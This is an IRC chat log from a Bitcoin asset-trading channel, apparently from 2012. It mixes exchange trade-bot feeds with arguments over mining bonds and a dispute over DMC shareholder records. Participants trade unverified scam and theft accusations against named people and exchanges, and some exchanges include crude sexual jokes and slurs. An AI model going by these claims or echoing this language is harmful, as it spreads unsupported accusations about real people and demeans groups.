kids/etc you know. Sep 11 16:54:55 oh well Sep 11 16:55:32 [GLBSE] [FUTUREFUND] 24000 @ 0.00012682 = 3.0437 BTC [+] Sep 11 16:55:53 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [-] Sep 11 16:55:55 [GLBSE] [GIGAMINING] 10 @ 0.6 = 6 BTC [-] Sep 11 16:55:56 [GLBSE] [GIGAMINING] 5 @ 0.6 = 3 BTC [-] Sep 11 16:55:57 [GLBSE] [GIGAMINING] 1 @ 0.552 BTC [-] Sep 11 16:56:03 !ticker f.giga.etf Sep 11 16:56:05 [MPEX:F.GIGA.ETF] 1day: 0.00038 / 0.00058414 / 0.000665 (787561 shares, 460.05 BTC), 30day: 0.00038 / 0.00087367 / 0.00115139 (11833433 shares, 10,338.55 BTC) Sep 11 16:59:25 EskimoBob: did gigavps sleep with your mother or something? Sep 11 16:59:34 why do you have the knives out for him? Sep 11 17:01:49 hrm Sep 11 17:01:54 I wonder why rg doesnt work for me yet Sep 11 17:02:08 Diablo-D3: I wonder too, you're such a people person Sep 11 17:02:16 no I mean Sep 11 17:02:18 rg doesnt like giga either Sep 11 17:02:22 oh Sep 11 17:02:28 and I dont particularly like giga Sep 11 17:02:36 that giga to tera shit I didnt like Sep 11 17:03:08 Is he lying? Sep 11 17:03:15 no, but its dirty Sep 11 17:03:27 either pay him now for 1:4 giga to tera trade Sep 11 17:03:29 what about 1:1 exchange Sep 11 17:03:30 or be stuck with 1:1 Sep 11 17:03:53 dirty? Sep 11 17:04:00 and you have to take the 1:4 deal or you get nothing Sep 11 17:04:08 so in economic terms Sep 11 17:04:12 it's not profitable Sep 11 17:04:20 once you investigate what is being offered? Sep 11 17:04:21 Upgrade fee is .4 per tera share or giga share Sep 11 17:04:33 ja I saw Sep 11 17:05:44 It's a free market Sep 11 17:05:49 the information is there Sep 11 17:05:52 ;;seen obsi Sep 11 17:05:52 obsi was last seen in #bitcoin-assets 2 days, 15 hours, 28 minutes, and 23 seconds ago: for a latte at starbucks Sep 11 17:05:59 if there are better deals then people can go somewhere else Sep 11 17:06:02 if people don't Sep 11 17:06:11 then that is their own fault more than anything else Sep 11 17:06:21 I don't believe in the concept of obscene profits Sep 11 17:06:30 unless its from a government granted monopoly Sep 11 17:06:50 nefario: no see Sep 11 17:06:52 the problem is this Sep 11 17:06:53 Bell Labs did a lot of good work Sep 11 17:07:01 unless you sell out of tera _now_ Sep 11 17:07:09 which means you lost half your investment if you paid at ipo prices Sep 11 17:07:23 1:1 trade means you're down to about 10% Sep 11 17:07:25 then that makes it a bad investment Sep 11 17:07:30 1:4 retains, eh, a quarter of your investment Sep 11 17:07:42 after paying out 40% upgrade price Sep 11 17:07:46 Diablo-D3: you've been running down DMC since you started so I don't know what you can really say Sep 11 17:08:01 nefario: its not that I ran it down Sep 11 17:08:07 its that I didnt understand the scam that was being played Sep 11 17:08:13 what scam? Sep 11 17:08:17 usagi didnt even figure it out until it was too late Sep 11 17:08:32 nefario: 1mhs bond issuers just selling bonds at half their previous value Sep 11 17:08:36 just to grab the money Sep 11 17:08:44 cashing out Sep 11 17:08:50 not cashing out Sep 11 17:08:54 just filling the bids Sep 11 17:09:05 I don't get it Sep 11 17:09:19 okay, lets pretend you're a 1mhs bond issuer Sep 11 17:09:24 "just filling the bids" Sep 11 17:09:30 you know you're going to personally own asic hardware Sep 11 17:09:31 The bids add support value, Diablo Sep 11 17:09:36 You want a constant wall of bids Sep 11 17:09:46 you know 1mhs prices are going to go from 0.30 to 0.01 or less Sep 11 17:09:55 You're not selling a consumable commodity Sep 11 17:09:59 *shakes head* Sep 11 17:10:00 you sell bonds into the wall and plunge the market down to 0.10 Sep 11 17:10:28 you just made several hundred btc that you can now mostly pocket Sep 11 17:10:31 I'll reread it then Sep 11 17:10:52 Because his company is better Sep 11 17:10:52 marketing Sep 11 17:11:00 Value is subjective Sep 11 17:11:03 and difficulty is skyrocketing, so you only have to pay out a fraction of those several hundred Sep 11 17:11:09 This isn't Marxist economics. Sep 11 17:11:22 and then you buy the asic hardware, which you probably already bought before you crashed your bonds Sep 11 17:11:34 and then all those bonds you sold just run on ONE of your asic rigs Sep 11 17:11:39 the rest you pocket. Sep 11 17:11:47 the entire market just paid for rigs they dont use Sep 11 17:11:55 nefario: now you understand? Sep 11 17:11:57 its dirty Sep 11 17:11:59 [GLBSE] [FUTUREFUND] 7870 @ 0.00012682 = 0.9981 BTC [+] Sep 11 17:12:00 giga did it worse Sep 11 17:12:09 he made people crash giga on their own just to pay for the 40% upgrade price Sep 11 17:13:31 yeah, dmc might not have the best contract in the world Sep 11 17:13:48 but Im not a lawyer and I tried to insulate dmc as much as possible without harming shareholders Sep 11 17:15:04 ;;later tell obsi message me asap Sep 11 17:15:06 The operation succeeded. Sep 11 17:15:14 Smoovious: I agree, it doesnt Sep 11 17:15:17 but we know that _now_ Sep 11 17:15:28 it creates a level of trust in the market that shouldnt be there Sep 11 17:16:32 So... why did DMC crash? This was before my time. And why no Sept dividend payment? Sep 11 17:16:45 Bugpowder: dividend cessation motion Sep 11 17:16:52 and I think Im going to undo it as well Sep 11 17:16:55 and go back to the contract Sep 11 17:16:58 usagi: The latter is indeed more reputable. Sep 11 17:17:12 Wait wait Sep 11 17:17:17 SLL has stocks? Sep 11 17:17:19 switch to future dividends borrowing mode and add aug (not sept, sept pays oct 1st) to it Sep 11 17:17:41 Bane_Capital: sll has TONS of shit Sep 11 17:17:58 but it's full of furfags and freaks Sep 11 17:18:17 furries Sep 11 17:19:21 furries AND flying penises Sep 11 17:19:24 dont forget that Sep 11 17:19:27 SLL currency is finding itself a niche it seems Sep 11 17:22:24 luckily there are no douchebags in bitcoin Sep 11 17:22:37 Luke-Jr Sep 11 17:22:39 EskimoBob Sep 11 17:22:48 that matthew guy Sep 11 17:22:53 the bitcoinica people Sep 11 17:22:55 pirate Sep 11 17:23:03 Luke-Jr is ok, what Sep 11 17:23:13 please don't list them all, no flooding Sep 11 17:23:19 pigeons: ;) Sep 11 17:23:37 Smoovious: at least its not a giant dicked herm fox. Sep 11 17:23:56 you'll need a douchebag after that. Sep 11 17:24:25 actually, it could be worse, it could be /ah/ Sep 11 17:26:00 [GLBSE] [JTME] 5 @ 0.89 = 4.45 BTC [-] Sep 11 17:26:01 yeah see, I just have sex with human women normally in real life. Sep 11 17:28:37 you misunderstood Sep 11 17:28:45 I dont dress up in a fur suit first. Sep 11 17:29:07 but women have three holes, and all three beg to be used for their intended purposes Sep 11 17:29:32 lol Sep 11 17:29:34 7 if you include the ears, but um, my giant german sausage simply wont fit in any of those Sep 11 17:29:54 cocktail wiener no? Sep 11 17:31:17 PsychoticBoy: nope, unless they make 7" cocktail wieners. Sep 11 17:31:24 lol Sep 11 17:31:38 hey, having a giant dick isnt all fun and games here Sep 11 17:31:40 frankfurter Sep 11 17:32:06 there are many women out there that have to be properly prepared for the experience. Sep 11 17:32:32 .......... Sep 11 17:33:04 Smoovious: no, thats just for special birthday parties Sep 11 17:34:29 lmfao Sep 11 17:36:48 seriously though, some chicks just need proper attention Sep 11 17:41:07 EskimoBob: listing douchebags for illustration purposes Sep 11 17:47:01 I am happy to report that DeaDterra has come through and delivered the S.DICE. Sep 11 17:47:31 scared? Sep 11 17:47:36 how did you get that from that? Sep 11 17:47:39 [GLBSE] [MU] 1 @ 0.2698 BTC [+] Sep 11 17:47:41 [GLBSE] [MU] 5 @ 0.2699 = 1.3495 BTC [+] Sep 11 17:47:41 I just think you're a troll Sep 11 17:51:20 [GLBSE] [YABMC] 20 @ 0.1102 = 2.204 BTC [-] Sep 11 17:52:08 [GLBSE] [YABMC] 36 @ 0.1101 = 3.9636 BTC [-] Sep 11 18:03:25 [GLBSE] [PUREASIC] 1 @ 0.82 BTC [+] Sep 11 18:04:34 [GLBSE] [OBSI.HRPT] 5 @ 0.1015 = 0.5075 BTC [-] Sep 11 18:11:18 [GLBSE] [PUREMINING] 1 @ 0.0975 BTC [-] Sep 11 18:12:07 [GLBSE] [GMVT-BOT] 50 @ 0.13998 = 6.999 BTC [-] Sep 11 18:12:09 [GLBSE] [GMVT-BOT] 15 @ 0.13998998 = 2.0998 BTC [+] Sep 11 18:12:10 [GLBSE] [GMVT-BOT] 24 @ 0.13999 = 3.3598 BTC [+] Sep 11 18:12:11 [GLBSE] [GMVT-BOT] 7 @ 0.13999999 = 0.98 BTC [+] Sep 11 18:12:13 [GLBSE] [GMVT-BOT] 49 @ 0.14 = 6.86 BTC [+] Sep 11 18:12:14 [GLBSE] [GMVT-BOT] 25 @ 0.14 = 3.5 BTC [+] Sep 11 18:15:46 [GLBSE] [OBSI.HRPT] 9 @ 0.1015 = 0.9135 BTC [-] Sep 11 18:16:30 [GLBSE] [MU] 2 @ 0.2699 = 0.5398 BTC [+] Sep 11 18:17:49 [MPEX] [S.DICE] 3500 @ 0.0034 = 11.9 BTC [+] Sep 11 18:18:38 [GLBSE] [NYAN.A] 1 @ 0.9 BTC [-] Sep 11 18:19:22 [GLBSE] [NYAN.B] 2 @ 0.95 = 1.9 BTC [+] Sep 11 18:19:44 [GLBSE] [FPGAMINING] 14 @ 0.8229 = 11.5206 BTC [-] Sep 11 18:22:57 [GLBSE] [FPGAMINING] 1 @ 0.8229 BTC [-] Sep 11 18:22:57 [GLBSE] [FPGAMINING] 9 @ 0.823 = 7.407 BTC [+] Sep 11 18:26:23 [GLBSE] [BFLS] 1 @ 0.7 BTC [-] Sep 11 18:26:45 [GLBSE] [DMC] 1 @ 0.05999999 BTC [-] Sep 11 18:29:44 [GLBSE] [FPGAMINING] 1 @ 0.8239 BTC [+] Sep 11 18:32:44 [GLBSE] [FUTUREFUND] 11 @ 0.00012682 = 0.0014 BTC [+] Sep 11 18:35:27 [GLBSE] [OBSI.HRPT] 35 @ 0.1015 = 3.5525 BTC [-] Sep 11 18:35:47 [GLBSE] [OBSI.HRPT] 1 @ 0.1015 BTC [-] Sep 11 18:36:55 [GLBSE] [FUTUREFUND] 4 @ 0.00012682 = 0.0005 BTC [+] Sep 11 18:37:03 [GLBSE] [BMF] 30 @ 0.5 = 15 BTC [-] Sep 11 18:37:55 [GLBSE] [FUTUREFUND] 2 @ 0.00012682 = 0.0003 BTC [+] Sep 11 18:43:44 [GLBSE] [ASICMINER] 1 @ 0.104 BTC [-] Sep 11 18:43:45 [GLBSE] [ASICMINER] 4 @ 0.104 = 0.416 BTC [-] Sep 11 18:43:47 [GLBSE] [ASICMINER] 96 @ 0.104499 = 10.0319 BTC [+] Sep 11 18:43:48 [GLBSE] [ASICMINER] 110 @ 0.10449999 = 11.495 BTC [+] Sep 11 18:43:49 [GLBSE] [ASICMINER] 100 @ 0.1045 = 10.45 BTC [+] Sep 11 18:43:51 [GLBSE] [ASICMINER] 200 @ 0.1047 = 20.94 BTC [+] Sep 11 18:43:52 [GLBSE] [ASICMINER] 290 @ 0.105 = 30.45 BTC [+] Sep 11 18:44:14 BUY CPA Sep 11 18:44:17 UP UP UP UP Sep 11 18:51:43 [GLBSE] [CPA] 4 @ 0.031 = 0.124 BTC [+] Sep 11 18:52:02 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.20747579 = 207.4758 BTC [-] Sep 11 19:03:44 [GLBSE] [YABMC] 1 @ 0.111 BTC [+] Sep 11 19:05:01 [MPEX] [O.BTCUSD.C100T] 600 @ 0.2074393 = 124.4636 BTC [-] Sep 11 19:05:37 [GLBSE] [RAREEARTH] 25 @ 0.00955 = 0.2388 BTC [+] Sep 11 19:06:37 [GLBSE] [YABMC] 1 @ 0.111 BTC [+] Sep 11 19:12:47 [GLBSE] [BDK.BND] 4 @ 0.1 = 0.4 BTC [-] Sep 11 19:13:14 http://25.media.tumblr.com/tumblr_l6lm2wBn0r1qc61zuo1_500.jpg so which one is the more competent and should get the job ? Sep 11 19:17:05 [GLBSE] [ASICMINER] 12 @ 0.105 = 1.26 BTC [+] Sep 11 19:18:56 [GLBSE] [CPA] 150 @ 0.031 = 4.65 BTC [+] Sep 11 19:23:40 [GLBSE] [NYAN.C] 4 @ 0.4 = 1.6 BTC [+] Sep 11 19:24:15 [GLBSE] [FPGAMINING] 4 @ 0.8101 = 3.2404 BTC [-] Sep 11 19:24:16 [GLBSE] [FPGAMINING] 5 @ 0.81 = 4.05 BTC [-] Sep 11 19:24:17 [GLBSE] [FPGAMINING] 5 @ 0.8 = 4 BTC [-] Sep 11 19:25:32 [GLBSE] [UDN] 1 @ 0.06 BTC [-] Sep 11 19:25:51 [GLBSE] [OBSI.HRPT] 1 @ 0.1015 BTC [-] Sep 11 19:33:59 [GLBSE] [DMC] 20 @ 0.05999999 = 1.2 BTC [-] Sep 11 19:37:27 [GLBSE] [FUTUREFUND] 1 @ 0.0001263 BTC [-] Sep 11 19:37:54 [GLBSE] [FUTUREFUND] 1 @ 0.0001263 BTC [-] Sep 11 19:38:32 [GLBSE] [FUTUREFUND] 1 @ 0.0001263 BTC [-] Sep 11 19:39:26 [GLBSE] [FUTUREFUND] 1 @ 0.0001263 BTC [-] Sep 11 19:39:55 [GLBSE] [FUTUREFUND] 1 @ 0.0001263 BTC [-] Sep 11 19:40:38 [GLBSE] [FUTUREFUND] 1 @ 0.0001263 BTC [-] Sep 11 19:42:22 [GLBSE] [ASICMINER] 5 @ 0.105 = 0.525 BTC [+] Sep 11 19:44:01 [GLBSE] [FUTUREFUND] 18 @ 0.0001263 = 0.0023 BTC [-] Sep 11 19:46:55 [GLBSE] [FUTUREFUND] 4 @ 0.0001263 = 0.0005 BTC [-] Sep 11 19:47:30 [GLBSE] [BFLS] 1 @ 0.7 BTC [-] Sep 11 19:53:00 [GLBSE] [BBBB] 4 @ 0.000239 = 0.001 BTC [-] Sep 11 19:58:08 [GLBSE] [ASICMINER] 1 @ 0.103 BTC [-] Sep 11 19:58:10 [GLBSE] [ASICMINER] 6 @ 0.102 = 0.612 BTC [-] Sep 11 20:02:40 [MPEX] [F.GIGA.ETF] 3549 @ 0.00066678 = 2.3664 BTC [+] Sep 11 20:02:42 [MPEX] [F.GIGA.ETF] 6052 @ 0.00066808 = 4.0432 BTC [+] Sep 11 20:02:56 [GLBSE] [GSDPT] 35 @ 0.00339999 = 0.119 BTC [+] Sep 11 20:03:14 [GLBSE] [BFLS] 13 @ 0.7 = 9.1 BTC [-] Sep 11 20:08:00 [MPEX] [S.MPOE] 22055 @ 0.00041204 = 9.0875 BTC [-] Sep 11 20:08:01 [MPEX] [S.MPOE] 24345 @ 0.000412 = 10.0301 BTC [-] Sep 11 20:10:02 ships cat? Sep 11 20:12:14 [GLBSE] [YABMC] 48 @ 0.111 = 5.328 BTC [+] Sep 11 20:12:15 [GLBSE] [YABMC] 100 @ 0.113 = 11.3 BTC [+] Sep 11 20:12:17 [GLBSE] [YABMC] 20 @ 0.1136 = 2.272 BTC [+] Sep 11 20:12:30 [GLBSE] [YABMC] 1 @ 0.11 BTC [-] Sep 11 20:12:32 [GLBSE] [YABMC] 20 @ 0.11 = 2.2 BTC [-] Sep 11 20:12:33 [GLBSE] [ARS] 50 @ 0.0155 = 0.775 BTC [+] Sep 11 20:13:00 [MPEX] [S.MPOE] 5155 @ 0.000412 = 2.1239 BTC [-] Sep 11 20:14:11 [GLBSE] [OBSI.HRPT] 5 @ 0.1015 = 0.5075 BTC [-] Sep 11 20:15:31 [MPEX] [S.MPOE] 2628 @ 0.00040831 = 1.073 BTC [-] Sep 11 20:18:13 [GLBSE] [FPGAMINING] 5 @ 0.760101 = 3.8005 BTC [-] Sep 11 20:18:15 [GLBSE] [FPGAMINING] 6 @ 0.760001 = 4.56 BTC [-] Sep 11 20:18:16 [GLBSE] [FPGAMINING] 3 @ 0.75 = 2.25 BTC [-] Sep 11 20:18:17 [GLBSE] [FPGAMINING] 10 @ 0.738 = 7.38 BTC [-] Sep 11 20:18:19 [GLBSE] [FPGAMINING] 8 @ 0.7352 = 5.8816 BTC [-] Sep 11 20:18:19 [GLBSE] [FPGAMINING] 2 @ 0.735 = 1.47 BTC [-] Sep 11 20:18:20 [GLBSE] [FPGAMINING] 1 @ 0.731 BTC [-] Sep 11 20:18:21 [GLBSE] [FPGAMINING] 5 @ 0.731 = 3.655 BTC [-] Sep 11 20:20:54 [GLBSE] [GIGAMINING] 1 @ 0.61989 BTC [+] Sep 11 20:23:03 [GLBSE] [BLUECHIP] 3 @ 0.1 = 0.3 BTC Sep 11 20:23:54 [GLBSE] [BDT] 27 @ 0.95 = 25.65 BTC [-] Sep 11 20:27:13 [MPEX] [S.MPOE] 7000 @ 0.00039704 = 2.7793 BTC [-] Sep 11 20:27:14 [MPEX] [S.MPOE] 36600 @ 0.00039631 = 14.5049 BTC [-] Sep 11 20:27:16 [MPEX] [S.MPOE] 6891 @ 0.00039476 = 2.7203 BTC [-] Sep 11 20:30:01 [MPEX] [S.MPOE] 8497 @ 0.00039476 = 3.3543 BTC [-] Sep 11 20:32:59 [GLBSE] [JTME] 1 @ 0.81 BTC [-] Sep 11 20:33:00 [GLBSE] [JTME] 4 @ 0.8 = 3.2 BTC [-] Sep 11 20:33:47 [GLBSE] [GIGAMINING] 1 @ 0.61989 BTC [+] Sep 11 20:33:49 [GLBSE] [GIGAMINING] 4 @ 0.574989 = 2.3 BTC [-] Sep 11 20:38:01 [MPEX] [S.MPOE] 3400 @ 0.00039476 = 1.3422 BTC [-] Sep 11 20:40:18 !ticker asicminer Sep 11 20:40:20 [GLBSE:ASICMINER] [Bid: 0.1016002] [Ask: 0.10499] [Spread: 0.0033898] [Last: 0.102] [24hVol: 109.9596539] [7dAvg: 0.11438628] Sep 11 20:43:47 [MPEX] [S.MPOE] 8558 @ 0.00039476 = 3.3784 BTC [-] Sep 11 20:43:48 [MPEX] [S.MPOE] 14295 @ 0.00039434 = 5.6371 BTC [-] Sep 11 20:43:49 [MPEX] [S.MPOE] 2883 @ 0.00039414 = 1.1363 BTC [-] Sep 11 20:45:56 wow, mircea_popescu was right Sep 11 20:46:05 glbse is a scam Sep 11 20:46:11 ... Sep 11 20:47:26 [GLBSE] [M.ETF] 1 @ 0.12 BTC [-] Sep 11 20:47:51 [MPEX] [S.MPOE] 23700 @ 0.0003954 = 9.371 BTC [+] Sep 11 20:48:00 [GLBSE] [OBSI.ABMO] 153 @ 0.1 = 15.3 BTC [+] Sep 11 20:51:01 [MPEX] [S.MPOE] 20717 @ 0.00039414 = 8.1654 BTC [-] Sep 11 20:51:02 [MPEX] [S.MPOE] 22200 @ 0.00039375 = 8.7413 BTC [-] Sep 11 20:51:03 [MPEX] [S.MPOE] 9983 @ 0.00039372 = 3.9305 BTC [-] Sep 11 20:54:01 [MPEX] [F.GIGA.ETF] 5100 @ 0.00066917 = 3.4128 BTC [+] Sep 11 20:55:48 Notice Sep 11 20:56:02 Diablo-D3 has been removed from operating DMC Sep 11 20:56:03 https://bitcointalk.org/index.php?topic=77469.msg1182044#msg1182044 Sep 11 20:56:14 notice: nefario has stolen almost 2000 btc in assets from DMC Sep 11 20:56:28 ugh Sep 11 20:56:30 wtf wa this ? Sep 11 20:56:36 until nefario returns said assets, DMC shares on GLBSE will not be recognized. Sep 11 20:56:56 there is no way to validate how many shares exist, who owns them, or to even pay dividends. Sep 11 20:57:06 I am going to make an official announcement on the DMC thread in a bit Sep 11 20:57:08 omg drama. Sep 11 20:57:08 LOL Sep 11 20:57:20 I was just going to buy 10000 shares Sep 11 20:57:27 whew! Sep 11 20:57:32 i blame mircea_popescu Sep 11 20:57:45 mircea_popescu: you're right, I should have listened to you and IPO'ed on mpex Sep 11 20:58:10 when did i say you should ipo on mpex ? Sep 11 20:58:16 lol Sep 11 20:58:19 sorry to hear the news Diablo-D3 Sep 11 20:58:29 this is like... dudes. are you on fucking speed ? Sep 11 20:58:32 i'm going to go read the thread and see if iunderstand what is happening Sep 11 20:58:39 wright nutso mass mail just went out minutes ago Sep 11 20:58:44 WHAT IS WRONG WITH YOU PEOPLE! Sep 11 20:59:01 [MPEX] [F.GIGA.ETF] 9600 @ 0.00066839 = 6.4165 BTC [-] Sep 11 20:59:02 [MPEX] [F.GIGA.ETF] 10099 @ 0.00066834 = 6.7496 BTC [-] Sep 11 20:59:03 [MPEX] [F.GIGA.ETF] 5339 @ 0.00066301 = 3.5398 BTC [-] Sep 11 20:59:24 Diablo-D3 no you got nothing, you could have sold DMC to me Sep 11 20:59:29 now Sep 11 20:59:43 PsychoticBoy: no, now I have to basically shut glbse down. Sep 11 20:59:58 hahahahahahahahahahahahaha Sep 11 21:00:06 it has harmed DMC shareholders, now of which may never get paid Sep 11 21:00:23 could they be harmed any more ??? Sep 11 21:00:33 nefario refuses to submit a list of who owns shares and how many shares they hold Sep 11 21:00:40 DMC has a right to this information Sep 11 21:00:44 you never asked me Sep 11 21:00:56 I have repeatedly asked you Sep 11 21:01:02 others have repeatedly asked for their own assets Sep 11 21:01:07 I don't have any record of that Sep 11 21:01:27 You are no longer a trustworthy source of information. Sep 11 21:01:39 you're being childish Sep 11 21:01:50 [GLBSE] [HYDRO.BONDS] 1 @ 1.445 BTC [-] Sep 11 21:01:52 [GLBSE] [MU] 1 @ 0.27 BTC [+] Sep 11 21:01:56 Am I? I did exactly what I needed to make sure DMC would succeed Sep 11 21:02:07 not only that, you have basically fucked up my investigation of asicminer Sep 11 21:02:25 [GLBSE] [ASICMINER] 1 @ 0.10499 BTC [+] Sep 11 21:02:52 Make your case on the forum thread Sep 11 21:03:12 in 1 week I will hold the motion on whether to keep you or not Sep 11 21:03:22 DMC shareholders decide Sep 11 21:04:03 I going to recommend they screenshot their GLBSE accounts so I can properly credit them and pay them their dividends directly. Sep 11 21:04:28 Diablo are you actually running any miners yourself? Sep 11 21:05:41 well, are you? Sep 11 21:05:53 do you physically hold any DMC assets? Sep 11 21:06:15 hi nefario Sep 11 21:06:20 im drunk Sep 11 21:06:24 lol Sep 11 21:06:25 hi Sep 11 21:06:27 good timing Sep 11 21:06:36 EskimoBob: nope, I decided to reverse the motion Sep 11 21:06:54 vlad waned to buy me 5k mnw debt for 12 issues of his mag Sep 11 21:06:59 wanted Sep 11 21:07:06 buy my Sep 11 21:07:08 fuck... Sep 11 21:07:10 i cant type Sep 11 21:07:23 drunk ? Sep 11 21:07:33 lol Sep 11 21:07:54 Chaang-Noi: buy from you or buy for you? Sep 11 21:08:07 ;pm Sep 11 21:08:40 poor mnw Sep 11 21:09:01 [MPEX] [F.GIGA.ETF] 5800 @ 0.00064686 = 3.7518 BTC [-] Sep 11 21:09:12 vlad cant save him Sep 11 21:09:24 unless i get 5000 btc Sep 11 21:09:27 who's gonna save you from a mob? Sep 11 21:09:28 no one. Sep 11 21:09:32 i do to Sep 11 21:09:32 superman? Sep 11 21:09:45 tommygun. Sep 11 21:09:50 wait, glbse doesn't have a facility to tell you who your shareholders are? Sep 11 21:09:55 dun dun dun. Sep 11 21:10:00 .45 ammo is expensive Sep 11 21:10:09 that seems like an odd omission Sep 11 21:10:10 copumpkin: no. Sep 11 21:10:13 he doesnt Sep 11 21:10:19 Ive repeatedly asked for it, others have as well Sep 11 21:10:19 i heard that as wel copumpkin Sep 11 21:10:24 nefario refuses to provide this information Sep 11 21:10:32 how can you not know who owns what Sep 11 21:10:35 Diablo-D3 hasn't asked me Sep 11 21:10:43 seems like it would be a table in a db Sep 11 21:10:49 it's not built into GLBSE Sep 11 21:10:52 and to make it so Sep 11 21:10:52 ic Sep 11 21:10:58 would require a change of the TOS Sep 11 21:11:10 it does shield you a bit Sep 11 21:11:12 not knowing Sep 11 21:11:34 copumpkin: so you basically can't list a corporation on glbse Sep 11 21:11:52 i'd agree with that Sep 11 21:12:00 [MPEX] [F.GIGA.ETF] 5500 @ 0.00064686 = 3.5577 BTC [-] Sep 11 21:12:06 copumpkin: since you can't declare ownership to the authorities Sep 11 21:15:00 [MPEX] [F.GIGA.ETF] 2200 @ 0.00064686 = 1.4231 BTC [-] Sep 11 21:15:01 [MPEX] [S.MPOE] 4600 @ 0.0003954 = 1.8188 BTC [+] Sep 11 21:15:44 nefario has no problem with change of service and fucking over greemnts :) Sep 11 21:15:55 [GLBSE] [ZETA-MINING] 5 @ 0.12540002 = 0.627 BTC [+] Sep 11 21:15:56 [GLBSE] [ZETA-MINING] 2 @ 0.12540001 = 0.2508 BTC [-] Sep 11 21:15:58 [GLBSE] [ZETA-MINING] 3 @ 0.1254 = 0.3762 BTC [-] Sep 11 21:16:00 I was just about to say,"wait a minute..." Sep 11 21:16:32 lol Sep 11 21:17:03 lol im not about to jump for support of reeses or saggy Sep 11 21:17:17 usaggai Sep 11 21:17:30 you are make no sense Sep 11 21:17:34 everyone should support reeses Sep 11 21:17:43 Chaang-Noi: does thailand have a good national liquor Sep 11 21:17:44 ? Sep 11 21:17:55 !ticker btc-mining Sep 11 21:17:56 cobra blood wine! Sep 11 21:17:58 !ticker btcmc Sep 11 21:18:00 !ticker obsi.abmo Sep 11 21:18:01 [GLBSE:BTC-MINING] [Bid: 0.86000001] [Ask: 0.996] [Spread: 0.13599999] [Last: 0.89] [24hVol: 16.095] [7dAvg: 0.9644909] Sep 11 21:18:06 [GLBSE:BTCMC] [Bid: 0.5501] [Ask: 0.58999] [Spread: 0.03989] [Last: 0.5898] [24hVol: ] [7dAvg: 0.54588333] Sep 11 21:18:08 [GLBSE:OBSI.ABMO] [Bid: 0.01000001] [Ask: 0.1] [Spread: 0.08999999] [Last: 0.1] [24hVol: 15.3] [7dAvg: 0.094] Sep 11 21:18:15 im drunk copukin Sep 11 21:18:19 on guniss Sep 11 21:18:26 irish stout Sep 11 21:18:28 [MPEX] [F.GIGA.ETF] 25525 @ 0.00065027 = 16.5981 BTC [+] Sep 11 21:18:30 Chaang-Noi: I know! Sep 11 21:18:36 but what's the national liquor? Sep 11 21:18:41 reeses twink piss Sep 11 21:18:43 of thailand? Sep 11 21:18:47 yep Sep 11 21:18:51 ladyboy armpit sweat Sep 11 21:18:51 guinness isn't liquor Sep 11 21:18:55 fermented elephant juice? Sep 11 21:18:58 it's liquid life Sep 11 21:19:00 alcoholic chicken Sep 11 21:19:02 mircea_popescu: lol Sep 11 21:19:18 you're able to get drunk on guinness? How many did you have? Sep 11 21:19:23 i dont think thailand has one Sep 11 21:19:30 they are budhists Sep 11 21:19:34 wityh the current one he's drunk 28 Sep 11 21:19:38 i drink irish stout Sep 11 21:19:55 and look where it's taken you. Sep 11 21:20:28 matthew is a scammer Sep 11 21:20:38 dibalo d3 is a scammer Sep 11 21:20:43 pirate is a scammer Sep 11 21:20:52 Chaang-Noi is a scammer Sep 11 21:20:54 [GLBSE] [OBSI.HRPT] 1 @ 0.10149999 BTC [-] Sep 11 21:20:55 [GLBSE] [OBSI.HRPT] 7 @ 0.1014 = 0.7098 BTC [-] Sep 11 21:20:57 [GLBSE] [OBSI.HRPT] 1 @ 0.1013 BTC [-] Sep 11 21:20:58 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [-] Sep 11 21:20:59 [GLBSE] [OBSI.HRPT] 4 @ 0.100101 = 0.4004 BTC [-] Sep 11 21:20:59 assbot is a scammer Sep 11 21:21:00 [GLBSE] [OBSI.HRPT] 2 @ 0.1001 = 0.2002 BTC [-] Sep 11 21:21:01 [GLBSE] [OBSI.HRPT] 3 @ 0.1000004 = 0.3 BTC [-] Sep 11 21:21:01 [GLBSE] [OBSI.HRPT] 9 @ 0.1000003 = 0.9 BTC [-] Sep 11 21:21:02 [GLBSE] [OBSI.HRPT] 6 @ 0.1000002 = 0.6 BTC [-] Sep 11 21:21:03 [GLBSE] [OBSI.HRPT] 21 @ 0.1000001 = 2.1 BTC [-] Sep 11 21:21:04 [MPEX] [O.BTCUSD.C100T] 148 @ 0.20693198 = 30.6259 BTC [-] Sep 11 21:21:05 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Sep 11 21:21:06 [GLBSE] [OBSI.HRPT] 43 @ 0.1 = 4.3 BTC [-] Sep 11 21:21:20 lmao Sep 11 21:21:50 climate is bad guys, time to take all your bitcoins and store them under your matress on a thumb drive Sep 11 21:21:51 [GLBSE] [OBSI.ABMO] 150 @ 0.1 = 15 BTC [+] Sep 11 21:21:58 yeah Sep 11 21:22:08 100% Sep 11 21:22:09 Azelphur mpex. Sep 11 21:22:14 lol Sep 11 21:22:16 assbot mos def deserves scammer taG Sep 11 21:22:17 scaaaaaaaaaaaaam Sep 11 21:22:26 mircea_popescu: you started paying interest again? Sep 11 21:22:28 mpex is a scam waiting to happen Sep 11 21:22:34 ^ that Sep 11 21:22:39 mpex = ponzi Sep 11 21:22:40 discuss Sep 11 21:22:45 no u, Sep 11 21:22:46 its fail Sep 11 21:22:51 what typeof fail who cares Sep 11 21:23:05 i would trust 1000k btc with pirate over mpex Sep 11 21:23:08 I DID A WITHDRAW AND I DIDN'T GET IT INSTANTLY ITS A SCAM Sep 11 21:23:30 lol Sep 11 21:23:36 course mpex is actually here since before anyone ever heard of either zhou thong or pirate guy. Sep 11 21:23:58 i think i was kicked off the ship Sep 11 21:24:05 with everyone else Sep 11 21:24:14 I still want someone to sue pirate Sep 11 21:24:35 mpex was not first stock exchange so claims was before know scammers Sep 11 21:24:36 lol Sep 11 21:24:52 azelphur do you notknow of my thread? Sep 11 21:25:00 Chaang-Noi: I do not know of your thread Sep 11 21:25:01 yay, a thread! Sep 11 21:25:05 and why pro pirate people hate me? Sep 11 21:25:10 link me to it Chaang-Noi Sep 11 21:25:13 one sec Sep 11 21:25:30 we need more threads to make a good yearn Sep 11 21:25:52 https://bitcointalk.org/index.php?topic=108282.0;topicseen Sep 11 21:26:00 [MPEX] [S.MPOE] 11000 @ 0.0003954 = 4.3494 BTC [+] Sep 11 21:26:08 oh i already read that one Sep 11 21:26:13 this si why the pro pirate peope "my frieinds" will not talk to me Sep 11 